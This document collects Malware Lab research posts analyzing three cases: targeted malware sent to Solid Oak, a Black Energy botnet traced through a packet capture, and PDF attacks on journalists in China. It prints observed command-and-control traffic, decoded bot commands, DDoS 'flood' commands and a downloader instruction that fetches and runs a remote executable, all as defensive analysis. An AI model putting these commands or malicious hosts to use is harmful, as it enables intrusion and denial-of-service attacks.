Malware Lab

By Nart Villeneuve

After researchers discovered that portions of China’s Greendam filtering software were stolen from an American filtering company’s software, Cybersitter, the company that produces the software, Solid Oak, same under a targeted malware attack. This short post from the Malware Lab (www.malwarelab.org) analyzes two samples from the attacks.

Findings:

• The delivery component of the attacks specifically targeted Solid Oak. In one case the attackers registered and used a Gmail account that was a misspelling of of a Solid Oak employees name and used it to send an email about a contextually relevant topic.
• These targeted emails contained (or linked to) malicious files that, if opened, caused the targets computer to become infected with a Trojan Horse program.
• In both cases the Trojan connects to (related) web servers but requests seemingly legitimate files. However, at certain times the attackers insert HTML command tags into these files with commands.

Background

In June 2009, it was reported that the Chinese government was requiring the installation of filtering software, known as Green Dam, on all personal computers sold in China.¹ Researchers from the University of Michigan analyzed Green Dam and discovered security vulnerabilities that would allow malicious attackers to take control of any computer running Green Dam.

In addition, they found that portions of Green Dam’s block lists were taken from a U.S. Company, Solid Oak, that produces a filtering product called CyberSitter, and that the image filtering component was taken from OpenCV, an open source project.² Bryan Zhang, the founder of Jin Hui, the company that created Green Dam, denied that Green Dam contained stolen code and stated that it was “impossible”.³ Solid Oak released a report detailing the incident and is reportedly seeking legal action against PC manufacturers that are shipping computers with Green Dam installed.⁴

On June 25, 2009 reports emerged stating that Solid Oak was under attack. In addition to “server problems” company executives began receiving suspicious emails.⁵

The following is an analysis of samples of malware sent to Solid Oak.

Sample 1

On June 25, 2009 an email message was sent to Brian Milburn, the CEO of Solid Oak, from “jenna.dipaquale@gmail.com”; Jenna DiPasquale (note the missing “s”) is the head of public relations for Solid Oak.

Date: Thu, 25 Jun 2009 05:49:18 -0400
Subject: This is the Jinhui Computer System Engineering Inc’s report about China’s Green Dam Youth Escort screening software.
From: Jenna DiPaquale
To: bmilburn@solidoak.com

This is This is the Jinhui Computer System Engineering Inc’s report about
China’s Green Dam Youth Escort screening software.
www.civis.com/jinhui_report.zipabout China’s Green Dam Youth Escort
screening software.
www.civis.com/jinhui_report.zip

The file, jinhui_report.zip, was no longer available at www.civis.com at the time of analysis so sample that Solid Oak provided was used. The zip file contains an executable:

Jinhui_Computer_System_Engineering_Inc_the_Chinese_government_officials_report.exe

However, Windows computers have a “feature” enabled by default that hides file extension cause the malicious executable to appear as if it is a directory/folder.⁶

When the malicious file is run (the user thinks he or she is opening a directory), a directory with the same name is created and the contents of that directory (a Word document, Jinhuisays.doc) is displayed to the user while malicious software is dropped on the system. The malicious file issues a connect to http://www.chuckfaganco.com/docs/rmscpt5.htm (76.76.146.89) (See Threat Expert for an automated report.⁷)

The User-Agent contains some interesting characters:

GET /docs/rmscpt5.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32) z3?xwc.InfoPath.so
Host: www.chuckfaganco.com

The response contains a “command” in a HTML comment tag:

<!– {/*jgJ-.J} –>

This command has since been removed from the requested page.

After opening the malware, a document is displayed, Jinhuisays.doc, but it does not contain malware.⁸

Sample 2

The second sample is a Power Point file, “Solid Oak seteps up China’net nappy.ppt” that exploits a vulnerability in Power Point to drop a malicious file. (For automated reports see Threat Expert and Virus Total.) ⁹

The malware drops a file “Net110..exe” which issues a connection to http://www.parkerwood.com/help/403-3.htm. (69.20.4.85) (For an automated report see Threat Expert.)¹⁰

Unlike Sample 1, the User-Agent does not contain interesting characters:

GET /help/403-3.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: www.parkerwood.com

This command appears as a html comment in the response:

<!– czox –>

base64 decode = s:1

It eventually changed to:

<!– czozMDA= –>

base64 decode = s:300

Other commands seen on www.parkerwood.com by accessing a variety of other pages throughout the site, such as /help/403-1.htm, /help/403-2.htm, /help/403-4.htm, /help/403-7.htm.

<!– czo0 –>

base64 decode = s:4

<!– czoyNDA= –>

base64 decode = s:240

<!– ZDpodHRwOi8vd3d3LnBhcmtlcndvb2QuY29tL2ltYWdlcy90b3AuZ2lm –>

base64 decode = d:http://www.parkerwood.com/images/top.gif

<!– {/*jgJ-nJ} –>

After dropping the Trojan, a Power Point presentation opens.

One interesting behaviour of this particular case is that the page(s) that the malware connects to change quite frequently. At times, command are inserted into the page in HTML comment tags only to be completely removed at a later time, sometimes within several hours of first appearing. These commands also change over time. In addition, sometimes pages are no longer present (404) but re-appear at a later time. At other times, all the pages are restricted (403).

Sample 2 connected to http://www.parkerwood.com/help/403-3.htm every 10 minutes. These connections were monitored starting at Fri Jul 10 14:50:01 2009 and after finally receiving a command Sat Jul 11 22:20:47 2009 the malware did not issue any further connections (the monitoring stopped at Wed Jul 15 08:11:44 2009).

Fri Jul 10 14:50:01 2009 – 403 Forbidden No Command
Fri Jul 10 23:10:16 2009 – 404 Not Found No Command
Sat Jul 11 22:10:46 2009 – 403 Forbidden No Command
Sat Jul 11 22:20:47 2009 200 OK <!– czozMDA= –> (base64 decode = s:300)

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Notes

[1] http://www.nytimes.com/2009/06/09/world/asia/09china.html
[2] http://www.cse.umich.edu/~jhalderm/pub/gd/
[3] http://online.wsj.com/article/SB124486910756712249.html
[4] http://www.cybersitter.com/gdcs.pdf and
http://www.pcworld.com/businesscenter/article/167842/suit_over_chinas_web_filter_to_target_lenovo_acer_sony.html
[5] http://government.zdnet.com/?p=5034, http://government.zdnet.com/?p=5049,
http://www.informationweek.com/story/showArticle.jhtml?articleID=218101882
[6] http://www.f-secure.com/weblog/archives/00001675.html
[7] http://threatexpert.com/report.aspx?md5=783c50f221c339f244ac68b38fcd30af
[8] http://www.virustotal.com/analisis/33e5495969fd497c439d18e7ea3976845c5454b378764a7b5dd887eef6bc8a9e-
1247083107
[9] http://www.threatexpert.com/report.aspx?md5=86f7cc8f65522a9d7eed8adf22bb9772 ,
http://www.virustotal.com/analisis/d1a5e159bfcdf3a22abf521d91bc83dd70ac3b1155c46eac5106450df17eb56b-
1247073429
[10] http://www.threatexpert.com/report.aspx?md5=1778671314196147402789eeb0c6d89c

by Nart Villeneuve

This Malware Lab blog post analyzes a packet capture file from an infected computer associated with a political figure. While evidence of compromise was found, the malware infection is most likely unrelated to political activities and was not a targeted attack. Rather, the infection is related to the criminal activities of attackers based in Russia or the Ukraine.

Key findings:

• From the malware connections recorded in the packet capture file we were able to discover malware that bundled a Black Energy bot with the “Oficla/Sasfis” Trojan downloader as well as known rogue/fake anti-virus software.
• We were able to access an interface to the Black Energy botnet that was not secured and observed the attackers conduct a brief DDoS attack.
• Despite being a Russian botnet, many of the domain names were .cn and many IP addresses were Chinese.
• This network is linked with an operation that spams nearly 4.3 million email addresses with gambling, pornography, pharmaceuticals, rogue AV software and other malware. It is also linked with an iframe injection campaign.

Background

In 2008, Steven Adair, from Shadowserver, noted that the Black Energy botnet was moving beyond just DDoS attack to other areas of cybercrime.

Black Energy this year went from just DDOSing to spreading keyloggers to steal credentials and passwords, Adair says. Like other botnets, it has been updating itself with new malware.¹

In fact this appears to be the case for a variety of botnets. Dancho Danchev states groups that used to specialize in DDoS attacks are “‘vertically integrating’ in order to occupy as many underground market segments as possible.”²

Another interesting observation by Danchev, that is supported by this investigation, is that DDoS vendors are attacking non-political sites in order to avoid drawing attention to themselves. Danchev explains:

It’s also worth pointing out that a huge number of “boutique vendors” of DDoS services remain reluctant to initiate DDoS attacks against government or political parties, in an attempt to stay beneath the radar. This mentality prompted the inevitable development of “aggregate-and-forget” type of botnets exclusively aggregated for customer-tailored propositions who would inevitably get detected, shut down, but end up harder to trace back to the original source compared to a situation where they would be DDoS the requested high-profile target from the very same botnet that is closely monitored by the security community.³

Instead, they focus on extortion schemes in which they charge for a protection racket (to not DDoS a web site) as well as encouraged “protected” sites to DDoS their competitors.

Now that various attacker groups have diversified it is difficult to distinguish their activities from one another. Different groups propagate eachother’s malware or use what FireEye calls a “BotnetWeb” which is defined as:

A collection of heterogeneous Botnets being operated in conjunction with each other controlled by one or more closely linked cyber criminal group(s).⁴

Some of this may be the result of splintering among more well established groups. The ThreatFire blog suggests that the Storm group has broken into several groups with some now teaming up with rogue AV’s.⁵ This realignment of criminal actors may partially explain the diversification of malware.

However, there also appears to be a significant role for “middlemen” who simply propagate content, whether it be advertisements, iframe injection, rogue AV’s, or botnet software.

Packet Capture

The packet capture from the infected computer shows a variety of malware activity. While the malware activity may be related there appears to be different types.

The infected computer connected to four control servers:

sexigood.ru (daro-x@yandex.ru)
81.176.232.103 – NEOWEB HOSTING, RU

091809.ru (bazhenov@mail.ru)
210.51.166.238 – China Netcom, CN

zflaersroot.cn (tem.ponakuru@mail.ru)
210.51.166.233 – China Netcom, CN

moneybizness.ru (belov@pisem.net)
210.51.10.184 – China Netcom, CN

The captured network traffic shows a connection from the infected computer to sexigood.ru (81.176.232.103) and a file “ R23.exe” is downloaded.

GET /1/R23.exe HTTP/1.0
Host: sexigood.ru

An automated analysis of “ R23.exe” by ThreatExpert shows that connections are issued to 091809.ru (210.51.166.238) and zflaersroot.cn (210.51.166.233) as well as core2724.openbiglibrarynow.com (94.125.90.163).6 However, the captured network traffic from the infected computer does not show any connections to core2724.openbiglibrarynow.com (94.125.90.163, IntTranspNet, RU).

Black Energy

Black Energy is a botnet toolkit and its primary functionality is Distributed Denial of Service (DDoS) attacks. The bots communicate with command and control server using the HTTP protocol. It is used by Russian hackers and Black Energy botnet kits can be purchased for about $40. There are at least 30 distinct Black Energy botnets.⁷ According to Arbor Networks, Black Energy botnets were used in the DDoS attack on Georgia in 2008.⁸

The captured network traffic from the infected computer does show a connection to 091809.ru (210.51.166.238) is a check-in:

POST /1/stat.php HTTP/1.0
Host: 091809.ru
id=x———-_382C0098&build_id=.8

HTTP/1.1 200 OK
MTA7MjAwMDsxMDsxOzI7MzA7MTAwOzM7MjA7MTAwMDsyMDAwI3dhaXQjMTAjeC0tLS0tLS0tLS1fMzgyQzAwOTg=

The response from the C&C is base64 encoded, when decoded it is:

10;2000;10;1;2;30;100;3;20;1000;2000#wait#10#x———-_382C0098

Further analysis of the Black Energy control server at 091809.ru (210.51.166.238) revealed the command interface that the attacker uses to issue commands to infected computers. According to the statistics in the interface the attackers had 2044 active bots, an average of 2418 per hour and 8105 per day. In total the attackers recorded 64346 infections.

Further investigation revealed the command interface for another Black Energy control server on the same IP address, sexiland.ru (210.51.166.238, China Netcom) was also accessible. According to the statistics in the interface the attackers had 3623 active bots, an average of 4869 per hour and 12749 per day. In total the attackers recorded 51813 infections.

During the investigation the attackers began a DDoS attack against “81.176.239.67” with the command:

flood http 81.176.239.67

The IP address is assigned to “Erix colocation and vps service” in Moscow, Russia and the only domain we found that resolved to this IP address is, vernem-prava.ru, which appears to be a web site selling services to obtain Russian driver’s licenses. The command was changed back to “wait” shortly thereafter.

Several minutes later the following command was issued on both Black Energy control servers which had a total of 5387 active bots at the time.

flood http www.vernem-prava.ru index.html

We also observed both command and control servers issues addition DDoS commands:

flood http besticq.ru
flood http www.newkaliningrad.ru forum
flood http wepn.ru
flood http 212.112.224.168

(The version of Black Energy running on these servers appears to be 1.7 as new files introduced with Black Energy 1.8 do not appear on these servers.⁹)

Oficla/Sasfis

After the connection to 091809.ru, there was a connection to zflaersroot.cn (210.51.166.233) where the infected computer is directed to download “bot.exe” from moneybizness.ru (210.51.10.184):

GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1 HTTP/1.1
Host: zflaersroot.cn

HTTP/1.1 200 OK
[info]runurl:http://moneybizness.ru/bot.exe|taskid:43|delay:30|upd:0|backurls:[/info]

An automated analysis of “bot.exe” shows that it connects to 091809.ru (210.51.166.238).¹⁰ Follow-up requests to zflaersroot.cn (210.51.166.233) instructed the infected computer to “delay.”

GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1&tid=43&r=1 HTTP/1.1
Host: zflaersroot.cn

HTTP/1.1 200 OK
[info]kill:0|delay:30|upd:0|backurls:[/info]

This behaviour is identical to Win32/Oficla, a trojan downloader.¹¹ In this case the Oficla download instructs the infected computer to download “bot.exe” which connect to the Black Energy control server.

Rogue AV’s

The malware file “R23.exe,” which the original infected computer downloaded from sexigood.ru (81.176.232.103), connected to to 091809.ru (210.51.166.238), the Black Energy control server, zflaersroot.cn (210.51.166.233), the Oficla/Sasfis control server, as well as a URL associated with rogue/fake antivirus software.¹²

hxxp://core2724.openbiglibrarynow.com/stat/action3.cgi?p=1&a=2724
hxxp://core2724.openbiglibrarynow.com/stat/action3.cgi?p=3&a=2724
hxxp://core2724.openbiglibrarynow.com/stget2.cgi?host=host&id=2724

In fact, there were additional malware files in the same directory as “R23.exe” on sexigood.ru (81.176.232.103) including “8.exe,”¹³ “R31.exe”¹⁴ and “Windows_Protector.exe.”¹⁵ An analysis of “ Windows_Protector.exe” showed that it downloaded another files named “PC_protect.exe” from core2724.openbiglibrarynow.com (95.211.26.5, NL-LEASEWEB, NL).¹⁶

This URL was found in hxxp://scanyourpc-fastx.com/pdm/x.exe “ Windows_Protector.exe.” The “x.exe”¹⁷ from scanyourpc-fastx.com (89.208.41.253, DINETHOSTING, RU) file connects to d45648675.cn (91.212.226.60) and begins an SSL encrypted session.
The files that were on sexigood.ru (81.176.232.103) were replaced with “Bee.dll,”¹⁸ “ked.exe,”¹⁹ “win2ext.exe,”²⁰ and “Windows_Protector.exe.”²¹ The “win2ext.exe” file connected to www.guruman.cn (210.51.181.69, E-Icann, China Netcom, CN) and perenils.cn (91.212.220.143, Group Vertical Ltd, RU).

“rundll32″

There were some connections, which appeared to be unrelated to the malware analyzed above, requesting “/toolbarprofit/images/body_bg_bot.jpg” from the IP address “66.197.149.41” (Network Operations Center Inc., US) with the host header “www.pay-per-install.info.” These connections are redirected “www.fbi.gov.” Software that connects to the IP address, “66.197.149.41,” is under review by PrevX.²²

GET /toolbarprofit/images/body_bg_bot.jpg HTTP/1.0
Referer: http://www.pay-per-install.info/
Host: www.pay-per-install.info

HTTP/1.1 301 Moved Permanently
Server: nginx
Location: http://www.fbi.gov/

The domain “www.pay-per-install.info” resolves to “127.0.0.1” and is an alias for “ddos.fuckingtest.net.”

$ host www.pay-per-install.info
www.pay-per-install.info is an alias for ddos.fuckingtest.net.
ddos.fuckingtest.net has address 127.0.0.1

Searches focused on “toolbarprofit” yielded an individual known as “rundll32” using the email address “toolbarprofit@gmail.com” and the ICQ number “561194042.”

There is a post by “rundll32” that advertises an “affiliate” program that is “not detected by any antivirus.” In this post “rundll32” advertizes the ICQ number “551802661” and the website “rundll32.ru.” The same text has been posted on a variety of Russian hacker forums.²³

While rundll32.ru resolves to 95.211.27.177 (NL-LEASEWEB, NL), www.rundll32.ru exhibits the same behaviour as www.pay-per-install.info:

$ host www.rundll32.ru
www.rundll32.ru is an alias for ddos.fuckingtest.net.
ddos.fuckingtest.net has address 127.0.0.1

Our investigation then focused on the email address, “rundll32@yandex.ru”, which was used to register rundll32.ru. A search for “rundll32@yandex.ru” returns a paper written by Alexander V. Prokhorov (or Prochorov), a student at Moscow State University, Russia.

The same search also returned a server that is being used for spam as well as iframe injection. In fact, “rundll32@yandex.ru” appears on a large spam list of 4,288,450 email addresses. There were a variety of templates as well as tools for sending spam located on the server across the following domains al of which are hosted on the same IP address (216.120.237.31, HostRocket Web Services, US): burkecoaching.com rentaplayer.com snowdomain.com solutionmgmt.com syattenterprises.com trailingfirecards.com noc8.com and strategymanagementinc.com.

In addition, we found a variety of redirects to various pornography sites as well as a pharmaceutical site, drugstopzap.com, and rogue AV sites. For example, the site, hxxp://destinybeijing.cn/?pid=156&sid=3f9ecd, redirects to hxxp://detect-spyware7.com/scan1/?pid=156&engine=pHT43Tj4NjEwMC4yMjkuNTYmdGltZT0xMjUuNYIMPAZM where the user is forced to download rogue AV software.²⁴

We also found that some pages redirected users to “counterweb.cn” which is hosted on the same IP address, 210.51.166.238 (China Netcom, CN) as the Black Energy command and control servers 091809.ru and sexiland.ru. The connections to counterweb.cn:

GET /t/out.php HTTP/1.1
Host: counterweb.cn
Referer: http://strategymanagementinc.com/uczqy/

HTTP/1.x 302 Found
Location: http://counterweb.cn/sutra/in.cgi?default

GET /sutra/in.cgi?default HTTP/1.1
Host: counterweb.cn
Referer: http://strategymanagementinc.com/uczqy/

HTTP/1.x 302 Found
Location: http://counterweb.cn/sutra/in.cgi?2

GET /sutra/in.cgi?2 HTTP/1.1
Host: counterweb.cn
Referer: http://strategymanagementinc.com/uczqy/

HTTP/1.x 302 Found
Location: http://google.com

We also found a variety of malicious javascript and iframes that loaded the following URLs:

hxxp://000007.ru/in.cgi?7 (92.241.177.223, NETPLACE, RU)
hxxp://javascrlpt.com/s/in.cgi?8
hxxp://newsmeta.net/s/in.cgi?8 (213.163.89.35, Telos Solutions, NL)
hxxp://veryblomar.com/vb/in.cgi?2 (69.64.155.121, eNom, US)

The domain, 000007.ru has been hosting “Windows_Protector.exe” which is the rogue AV we also found on sexigood.ru (81.176.232.103).²⁵ The domain, javascrlpt.com was found serving Zeus related binaries from a Chinese IP address.²⁶ All these domain names appear to have been used in iframe injection attacks.

Additional searches reveal web sites that contained similar scripts and tools as those used on the domains listed above including dark-studio.by.ru, erre-way.by.ru and www.exterv.com.

Storm

There was another connection of interest in our packet capture sample to “78.159.121.122” (NETDIRECT-NET, DE) which is very similar to the connection between a Storm “supernode” and a “subcontroler” as described by SecureWorks’ Joe Stewart.²⁹

POST /u/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Internet Explorer
Host: 78.159.121.122
Content-Length: 712
Pragma: no-cache

a=ZYCmeXPQwHEj9qGWsUqvzJf0nNCYaVvxlGKWOu3H4Gr[...]&b=RlzWZPqmoRdB1XyjNGfn1GC3n5KdXpmROtMz33ItiXrNIJyw[...]

HTTP/1.1 200 OK
Date: Tue, 13 Oct 2009 08:30:16 GMT
Server: Apache/2.2.11 (FreeBSD) PHP/5.2.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.9
Content-Length: 28
Connection: close
Content-Type: text/html

#���(NöÎ(5ëÊ9J#!švÝôÐpo°à¢Ëµ

According to Joe Stewart the “master” control server is often protected by another nginx server. However, the server on 78.159.121.122 appears to be Apache.

It is unclear if this is related to the malware “bundle” described in this post.

Notes

1 http://www.darkreading.com/security/management/showArticle.jhtml?articleID=211201241

2 http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.html

3 http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.html

4 http://blog.fireeye.com/research/2009/11/killing-the-beastpart-4.html

5 http://www.blogcatalog.com/blog/threatfire-research-blog/56298e2ced094ff86574560566e158a1

6 http://www.virustotal.com/analisis/46841255cd4e91cf93c74c539c13cf57beea6ec33c0c6502c2d14fb7182ce7ef-1256048818 and http://www.threatexpert.com/report.aspx?md5=6de4aeaca08b57339e2890a35c84a968

7 http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf

8 http://asert.arbornetworks.com/2009/01/russia-opposition-websites-and-ddos/

9 http://malerisch.net/docs/black_energy_ddos_1_8/blackenergy18.ppt

10 http://www.threatexpert.com/report.aspx?md5=78919f875e9cea75a491b8d620453d1b and http://www.virustotal.com/analisis/69ed9c0fdb9a0ac4631acba396cd22569a4670965017b6903cef050c63eaa0d6-1256051615

11 http://www.malwareurl.com/search.php?domain=&s=Oficla&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on and http://www.threatexpert.com/report.aspx?md5=8ba3f334d7c840c08317eed8274478d2

12 http://www.malwaredomainlist.com/mdl.php?search=openbiglibrarynow.com

13 http://www.virustotal.com/analisis/d32c1247b9cc80db7c50bd0b91d3a4d523672e9c238f99e1972b75d04340ab88-1255645683 and http://www.threatexpert.com/report.aspx?md5=0d431ffb676be2c091eda0445282b59e

14 http://www.virustotal.com/analisis/8e0df4b3e31afd1e73d68bdf7bb3f35c61d9d12cf35c0d36a8b0d98459b88b40-1255645829 and http://www.threatexpert.com/report.aspx?md5=4672d5000ea2ed47ff7089666bf18186

15 http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1255652491 and http://www.threatexpert.com/report.aspx?md5=43ec3ee7742dc809dc2690508b111ddf

16 The IP address changed.

17 http://www.virustotal.com/analisis/9d8ea6a2706f4a12c0fa78185811f31a9a64984d7f37667f73b7b5fba345a281-1256064976 and http://www.threatexpert.com/report.aspx?md5=18a5036b5855f40f8bf1bc37e7712115

18 http://www.virustotal.com/analisis/ab462e64ee3b87ef775ebd361e2290d02544aeb3df91c132a69c8cc3c7737d46-1256065684

19 http://www.virustotal.com/analisis/863f9a65b9496ce991a6a4d7d0cfd6260b290a59e16e14eab64ce2ac1a80836d-1256065745

20 http://www.virustotal.com/analisis/3cd06a2911f0b9e98b50dcb1148b7d12743a17b0c30ae707d240ba36b6f0e043-1256005930 and http://www.threatexpert.com/report.aspx?md5=7d73fe4a05fbc21a32fa620d92587102

21 http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1256016137

22 http://spywarefiles.prevx.com/RRDEFI44668732/ITUN~KA2.EXE.html and http://www.prevx.com/filenames/X824695795861965386-X1/LATEST5FUPDATE.EXE.html

23 http://forum.xakep.ru/m_1578962/mpage_1/key_/tm.htm#1578962 , http://74.125.95.132/search?q=cache:YeAN_Ax_3oMJ:secnull.ru/lofiversion/index.php/t2214.html+%22561194042%22&cd=10&hl=en&ct=clnk&gl=ca

24 http://www.virustotal.com/analisis/be2a26d07f7bdb14b72a1e21369744859bce7a77b820196a58c64bd4bf0c62ca-1256670552

25 http://www.malwaredomainlist.com/mdl.php?search=000007.ru

26 http://www.malwaredomainlist.com/mdl.php?search=javascrlpt.com

27 When connecting directly to the requested file, a 403 HTTP header is received, however, when connecting with “www.pay-per-install.info” as the host header the browser is redirected to www.fbi.gov.

28 http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/ and http://news.cnet.com/8301-10789_3-10040669-57.html and https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf

29 https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

By Nart Villeneuve and Greg Walton

Overview

There have been recent reports of malware attacks on journalists based in China. The attacks specifically targeted Chinese employees working for media organizations, including Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa.¹ These employees received an email from “Pam ” who claimed to be an editor with the Straits Times, that came with a PDF attachment that contains malware. When opened, malicious code in the PDF exploits the Adobe Reader program and drops the malware on the target’s computer.

These attacks correlate with reports of increased security measures within China as a result of the 60th anniversary of the founding of the People’s Republic of China.² These increased security measures have also been extended to the Internet, with providers of anti-censorship technology reporting increased levels of blocking that prevents people from accessing the web sites of foreign media and news organizations.³

This short briefing from the Malware Lab and the Information Warfare Monitor analyzes a sample from one of the attacks on behalf of an international news agency that operates in China, and a member of the Foreign Correspondents Club in Beijing.⁴

Key Findings:

• The content of the email, and the accompanying malicious attachment, are in well written English and contain accurate information. The email details a reporter’s proposed trip to China to write a story on China’s place in the global economy; all the contacts in the malicious attachment are real people that are knowledgeable about or have a professional interest in China’s economy.
• The domain names used as “command & control” servers for the malware have been used in previous targeted attacks dating back to 2007. The malware domain names, as in previously documented cases, only resolve to real IP addresses for short periods of time.
• The malware exploits vulnerabilities in the Adobe PDF Reader, and its behaviour matches that of malware used in previous attacks dating back to 2008. This malware was found on computers at the Offices of Tibet in London, and has used political themes in malware attachments in the past.
• The IP addresses currently used by the malware are assigned to Taiwan. One of the servers is located at the National Central University of Taiwan, and is a server to which students and faculty connect to download anti-virus software. The second is an IP address assigned to the Taiwan Academic Network. These compromised servers present a severe security problem as the attackers may have substituted their malware for anti-virus software used by students, employees, and faculty at the National Central University.

Analysis

The email sent to the foreign correspondents from “Pam ” appears to be customized and targeted. The context of the letter and the attached PDF, “Interview list.pdf” is specific to journalists. The email itself is focused on setting up meetings for journalists in China, and the attached PDF contains a list of genuine contacts in China that relate to the context of the email. The name of the hotel and its address are accurate. Moreover, the purpose for the trip to China, to research the “annual economic survey,” correlates with the World Economic Forum’s release of its “Global Competitiveness Report” on September 8, 2009 and the conference that followed in Dalian, China on September 10-12, 2009.⁵

The PDF contains malicious code that exploits Adobe Acrobat and drops malware on the target’s computer. Only 3 of 41 anti-virus products used by Virus Total detected the malicious code embedded in the PDF.⁶

When opened, the PDF displays a list of contacts. The contacts listed in the PDF appear to be genuine. All the names and titles in the document are accurate. However, some appear to be former positions held by the individuals, indicating that the document is somewhat dated. It is possible that this document is a legitimate document stolen from a compromised machine, modified to include malware, and used as a lure to entice people to open the malicious attachment.

After opening the attachment, malware is silently dropped on the target’s computer.

The malware attempts DNS resolution for three domains: mail.amberice.com, menberservice.3322.org, and zwy2007.pc-officer.com. Often the domain names will not resolve to proper IP addresses; other times they will resolve only for a short period of time. In this case, two of the domain names eventually resolved:

menberservice.3322.org | 140.115.182.230
zwy2007.pc-officer.com | 210.240.85.250

The domain name zwy2007.pc-officer.com resolves to 210.240.85.250 which is an IP address assigned to the Taiwan Academic Network, Ministry of Education Computer Center. The malware was unable to make successful connections to this IP address.

However, the domain name “pc-officer.com” is a well known malware domain name that has been used in previous attacks. In 2007, Maarten Van Horenbeeck investigated cases of targeted attacks that used a “petition to the International Olympic Committee on Chinese human rights violations” as the theme.⁷ In those cases, the malware attempted to connect to:

ihe1979.3322.org
ding.pc-officer.com | 61.219.152.125

The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.

A similar case was investigated by F-Secure earlier this year.⁸ In that case, the domain names that the malware attempted to connect to were:

ihe1979.3322.org
feng.pc-officer.com | 216.255.196.154
feng.pc-officer.com | 211.234.122.84

The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.

The domain menberservice.3322.org eventually resolved to 140.115.182.230, which reverse resolves to avirus.is.ncu.edu.tw. This location (https://avirus.is.ncu.edu.tw:4343/officescan/console/html/ClientInstall/) is at the National Central University of Taiwan, and it is used by students and faculty to download anti-virus software.⁹ This is potentially a severe security problem, as the attackers may have substituted their malware for anti-virus software for use by students, employees, and faculty at the National Central University.

menberservice.3322.org | 140.115.182.230 | avirus.is.ncu.edu.tw

The malware connects to this location and begins sending and receiving information:

POST http://menberservice.3322.org:8000/LFDXFiRcVs3902.rar HTTP/1.1
User-Agent: Mozilla/4.2.20 (compatible; MSIE 5.0.2; Win32)
Host: menberservice.3322.org
Content-Length: 682
Proxy-Connection: keep-alive
Pragma: no-cache
.new_host_42

HTTP/1.1 200 OK
Date: Tue Sep 22 21:41:10 2009
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 32
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

The malware matches behaviour documented by ThreatExpert earlier this year.¹⁰ Documents with names such as “Urgent Appeal to Secretary Hillary Clinton.doc” and “Days with ITSN Tibet in My Eyes.doc” contained malware that connected to mmwbzhij.meibu.com on ports 8585 and 8686.

http://mmwbzhij.meibu.com:8686/[random characters].[random file extension]

where [random characters] string may look similar to:

* qRXycRXuwJ11749
* PqJNBkcPDm18630
* ZPDPyZkZcV23661

and [random file extension] can be any of the following: rm, mov, mp3, pdf.

This matches behaviour that the Information Warfare Monitor documented in the “Tracking GhostNet” report¹¹ after analyzing a compromised computer at the Offices of Tibet in London, U.K. In that case, there were connections to oyd.3322.org which resolved to 58.141.132.66 on port 4501:

POST http://oyd.3322.org:4501/TkBXPPXkRL14509.pdf HTTP/1.1
User-Agent: Mozilla/4.8.20 (compawhichplatform.htmtible; MSIE 5.0.2; Win32)
Host: oyd.3322.org
Content-Length: 46
Proxy-Connection: keep-alive
Pragma: no-cache
new_host_24

HTTP/1.1 200 OK
Date: Wed Oct 01 23:05:15 2008
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 44
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

A follow-up visit to OOT-London found another malware infection connecting to mmwbzhij.meibu.com which resolved to 216.131.67.95 on port 8686:

POST http://mmwbzhij.meibu.com:8686/yDFDcVoFma29957.mp3 HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: mmwbzhij.meibu.com
Content-Length: 32
Proxy-Connection: keep-alive
Pragma: no-cache
.new_host_23

HTTP/1.1 200 OK
Date: Fri Apr 10 22:49:22 2009
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 32
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

The domain names 3322.org and meibu.com are dynamic DNS services that allow the attackers to map domain names to IP addresses they control. In these cases, the attackers are not required to register domain names. Attackers typically favour dynamic DNS services such as these.¹² The attackers have pointed these domains to IP’s on the networks of Black Oak Computers Inc, CA, USA, and C&M Communication Co., Ltd., Korea, in addition to the Taiwan Academic Network.

The control servers on pc-officer.com have, in the past, resolved to IP addresses on One Eighty Networks, WA, USA, KIDC, Korea and HINET, Taiwan, in addition to the National Central University of Taiwan’s server where students and faculty download anti-virus software.

Attribution Issues

In general, determining attribution in these types of attacks is difficult. Analyzing domain registration and other contextual information can occasionally provide some useful leads.

